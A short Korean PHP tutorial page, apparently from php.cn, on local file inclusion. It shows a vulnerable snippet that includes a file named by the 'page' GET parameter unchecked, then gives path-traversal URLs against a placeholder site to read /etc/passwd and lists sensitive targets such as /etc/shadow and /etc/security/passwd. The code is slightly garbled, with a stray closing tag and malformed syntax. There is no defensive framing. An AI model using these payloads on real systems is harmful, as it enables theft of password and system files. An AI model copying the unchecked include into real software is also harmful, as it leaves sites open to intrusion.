> 백엔드 개발 > PHP 튜토리얼 > PHP는 취약한 코드가 포함된 로컬 파일을 위조합니다.

PHP는 취약한 코드가 포함된 로컬 파일을 위조합니다.

高洛峰
풀어 주다: 2023-03-01 12:56:02
원래의
1246명이 탐색했습니다.

코드는 다음과 같습니다.
$page=$_GET['page']
include($page.'php')?> 🎜>
이렇게 사용하시면 됩니다
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index .php?page= ../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

더 많은 업데이트 받기 다중 데이터:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/ 그룹
/etc /security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿